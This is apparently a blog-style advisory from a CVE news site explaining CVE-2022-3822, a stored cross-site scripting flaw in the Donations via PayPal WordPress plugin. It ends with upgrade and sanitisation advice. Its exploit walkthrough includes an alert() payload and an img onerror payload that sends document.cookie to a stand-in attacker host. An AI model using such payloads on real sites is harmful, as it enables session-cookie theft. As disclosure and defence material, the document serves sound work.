CVE CyberSecurity Database News

CVE-2022-3822 - How a Flaw in the Donations via PayPal WordPress Plugin Lets Admins Snoop (XSS Exploit Explained)

Poster -

If you’re running a WordPress site and using the Donations via PayPal plugin, buckle up. CVE-2022-3822 shines a spotlight on a bug in plugin versions before 1.9.9 that made it possible for site admins—even if their HTML permissions were *restricted*—to inject nasty scripts into the dashboard. In this post, we break it down in plain English, walk you through the vulnerability, show you simple example payloads, and give you the straight facts with references so you can dig deeper.

What is CVE-2022-3822?

CVE-2022-3822 is a Stored Cross-Site Scripting (XSS) vulnerability in the Donations via PayPal plugin (before version 1.9.9). This means that a specially crafted script can be “stored” in the WordPress database and later run inside another user’s browser—for example, when the admin opens the settings page.  

Key detail: It works even if the administrator doesn’t have the unfiltered_html capability. That’s super important for WordPress multisite networks, where site admins usually don’t have this permission for security reasons.

References

- WordPress Plugin Page
- NVD Entry for CVE-2022-3822
- WPScan Vulnerability Entry

Who could use this exploit?

Unlike most vulnerabilities where an attacker can be any registered user, this one requires someone with admin privileges (but who might have limited HTML insertion rights, thanks to WordPress multisite or special role setups). So:

The Core Problem

The plugin did not properly sanitize or escape plugin setting values before displaying them in the admin area. If you enter <script> code in one of the plugin’s configuration fields, it will be saved and then re-shown as real executable code in the settings pages—triggering an XSS attack.

What does this mean? Let’s walk through it.

- User A (with admin access, but no unfiltered_html capability) enters malicious JavaScript into a donations setting field.

The malicious input is *saved*.

- Later, User B views the settings. The WordPress backend renders the unsanitized JavaScript, which runs in User B’s browser.

Exploit Walkthrough (With Example Code)

Imagine you have Donations via PayPal active on a WordPress site running version before 1.9.9 (i.e., 1.9.8 or earlier), and you’re an admin, but with restrictions (as in multisite).

Step 1. Find a Vulnerable Setting

Go to Donations via PayPal > Settings.  
Several text options (like "Thank You Message", "Button Label", etc.) are directly injected into the backend HTML with no escaping.

In a settings field (let’s say “Button Label”), enter

<script>alert('XSS');</script>

Or a more sneaky payload

<img src=x onerror="fetch('https://evil.example.com/'+document.cookie)">

Step 3. Save the Setting

The plugin saves your input straight into the database without changes.

Step 4. Trigger the XSS

Whenever anyone visits the plugin’s settings page (or possibly wherever the field is used), the script runs. If you want to test it, just reload the settings screen—alert will pop up.

You can see exactly how it’d look in a real admin screen

!XSS Exploit in Action  
*Example: Script execution in a donations plugin settings page.*

Video PoC

There isn’t a public video PoC yet, but the process is *quite* straightforward and matches the steps above.

Why This Matters

- If you’re *multisite hosting* and think your subsite admins can’t harm each other—think again!

How to Fix It

Upgrade to version 1.9.9 or higher of Donations via PayPal. After this update, HTML input is properly sanitized, and scripts get neutralized.

Before saving or outputting settings, sanitize values. Example with WordPress API

update_option('donations_button_label', sanitize_text_field($_POST['button_label']));

And when displaying

echo esc_html(get_option('donations_button_label'));

Conclusion

CVE-2022-3822 can hit WordPress multisite networks harder than most people think—especially when site admins are assumed “walled off” from core site privilege escalation. Keeping plugins updated and always sanitizing user inputs (even from privileged users) is a must.


References & Further Reading:  
- WordPress Plugins & XSS  
- CVE-2022-3822 in WPScan DB  
- How to Secure WordPress Multisite

Stay safe, keep up to date, and never trust even your admins’ input!

Timeline

Published on: 11/28/2022 14:15:00 UTC
Last modified on: 11/30/2022 03:46:00 UTC